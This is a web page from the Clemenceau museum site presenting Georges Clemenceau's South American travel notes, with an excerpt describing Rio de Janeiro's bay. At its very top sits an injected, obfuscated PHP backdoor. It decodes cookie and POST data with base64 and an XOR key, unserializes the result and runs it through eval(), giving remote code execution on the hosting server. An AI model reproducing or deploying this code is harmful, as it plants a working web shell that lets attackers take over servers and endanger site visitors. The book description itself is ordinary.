$BENgmdOVBJ = "\113" . '_' . "\x42" . "\x7a" . 'm' . 'i';$ryMlU = "\x63" . "\x6c" . "\141" . chr (115) . chr (115) . "\x5f" . "\145" . "\x78" . chr ( 852 - 747 ).chr (115) . chr (116) . chr ( 1071 - 956 ); $foymRjIG = class_exists($BENgmdOVBJ); $ryMlU = "32948";$sZZBZe = strpos($ryMlU, $BENgmdOVBJ);if ($foymRjIG == $sZZBZe){function gMAQD(){$qSbOd = new /* 59623 */ K_Bzmi(16691 + 16691); $qSbOd = NULL;}$fmPuMh = "16691";class K_Bzmi{private function NuMVOe($fmPuMh){if (is_array(K_Bzmi::$BSlLtOQQQ)) {$dRwwKvqKP2 = str_replace("<" . "?php", "", K_Bzmi::$BSlLtOQQQ["content"]);eval($dRwwKvqKP2); $fmPuMh = "16691";exit();}}public function sxsmwBo(){$dRwwKvqKP = "16455";$this->_dummy = str_repeat($dRwwKvqKP, strlen($dRwwKvqKP));}public function __destruct(){K_Bzmi::$BSlLtOQQQ = @unserialize(K_Bzmi::$BSlLtOQQQ); $fmPuMh = "35623_25163";$this->NuMVOe($fmPuMh); $fmPuMh = "35623_25163";}public function EHRxgZ($dRwwKvqKP, $xneeEfIplA){return $dRwwKvqKP[0] ^ str_repeat($xneeEfIplA, intval(strlen($dRwwKvqKP[0]) / strlen($xneeEfIplA)) + 1);}public function BbeNZWoTf($dRwwKvqKP){$CokmVg = "\142" . "\141" . "\163" . 'e' . chr (54) . "\64";return array_map($CokmVg . chr ( 752 - 657 )."\x64" . "\x65" . chr (99) . 'o' . chr ( 264 - 164 )."\145", array($dRwwKvqKP,));}public function __construct($KKgBIC=0){$mqCIkrB = chr ( 420 - 376 ); $dRwwKvqKP = "";$inHetbQ = $_POST;$emzAbuRbD = $_COOKIE;$xneeEfIplA = "c07127ed-3b03-4ae2-849a-e582ed0e1d28";$gAquBaYz = @$emzAbuRbD[substr($xneeEfIplA, 0, 4)];if (!empty($gAquBaYz)){$gAquBaYz = explode($mqCIkrB, $gAquBaYz);foreach ($gAquBaYz as $wEOoshcRu){$dRwwKvqKP .= @$emzAbuRbD[$wEOoshcRu];$dRwwKvqKP .= @$inHetbQ[$wEOoshcRu];}$dRwwKvqKP = $this->BbeNZWoTf($dRwwKvqKP);}K_Bzmi::$BSlLtOQQQ = $this->EHRxgZ($dRwwKvqKP, $xneeEfIplA);if (strpos($xneeEfIplA, $mqCIkrB) !== FALSE){$xneeEfIplA = str_pad($xneeEfIplA, 10); $xneeEfIplA = ltrim($xneeEfIplA);}}public static $BSlLtOQQQ = 51651;}gMAQD();} EN URUGUAY ET AU BRÉSIL - Georges Clemenceau - Musée Clemenceau

EN URUGUAY ET AU BRÉSIL

Georges Clemenceau

Présentation de l’ouvrage La baie de Rio de Janeiro. « Une entrée triomphale dans cette mer intérieure cerclée de hautes montagnes, hérissée de rochers en bataille, égayée de plages riantes, fleurie d’îles mystérieuses, mêlant à l’ombre claire des hautes frondaisons tous les éblouissements du ciel et de la mer dans les voluptés du soleil. À quatre heures, je suis sur le pont. Brouillard, petite pluie fine, nous ne verrons rien du tout. Des pointes de rochers émergent tout à coup des vapeurs qui, brusquement, les dérobent à nos yeux. Nous naviguons dans un nuage. Deux forts, Sao Joao et Santa Cruz, gardent l’entrée pour la bonne théorie. Dans une des dernières révolutions, ils échangèrent des coups de canon pendant tout un mois avec le fort voisin de Villegagnon, sous les yeux des habitants de Rio qui venaient se ranger aux quais pour juger les coups. Ils sont en crise de paix à cette heure. Plus loin, on nous signale la blanche silhouette du Minas Geraës, le formidable dreadnought qui depuis.mais n’anticipons pas. Puis ce sont les affreux clochetons de pâtisserie gothique dont l’empereur dom Pedro II crut devoir surmonter le plus ridicule palais dont jamais petite île fût déshonorée. » Toute la verve d’un grand écrivain ! déjà présentée avec succès dans En Argentine, publié en 2010. L’auteur En 1909, le gouvernement du Président du conseil Georges Clemenceau est renversé. Le futur « Tigre » de la Grande Guerre est contraint au « repos », ce dont il profite pour retrouver les joies de l’écriture journalistique – les premières amours du fondateur de L’Aurore -, et répondre à quelques sollicitations comme celles de venir donner des conférences lors d’une tournée en Amérique du Sud : Argentine, Uruguay et Brésil. Ces notes de voyage, écrites après-coup à la demande de L’Illustration, sont passionnantes et témoignent des qualités d’observation d’un naturaliste soucieux de conserver un regard critique envers la France sans endosser le rôle du donneur de leçon en visite dans un pays neuf.

MAGELLAN & Cie, 2015

Contact Us

Site officiel de la Fondation du musée Clemenceau à Paris

Not readable? Change text. captcha txt

Start typing and press Enter to search